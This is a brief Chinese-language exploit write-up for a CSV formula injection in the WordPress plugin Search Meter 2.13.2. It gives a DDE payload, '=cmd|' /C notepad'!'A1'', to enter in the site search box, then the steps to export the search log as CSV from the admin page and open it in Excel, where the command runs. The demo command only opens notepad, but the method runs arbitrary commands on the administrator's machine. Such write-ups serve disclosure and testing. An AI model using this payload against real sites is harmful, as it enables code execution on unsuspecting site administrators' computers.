WordPress Plugin - Search Meter 2.13.2 CSV Injection¶

首先在搜索框里输入paylaod

=cmd|' /C notepad'!'A1'

然后访问 http://url/wordpress/wp-admin/index.php?page=search-meter%2Fadmin.php 并且到处csv文件

之后，我们在Excel中打开文件，并使用逗号作为分隔符从外部文件导入数据

这时候payload就会被执行了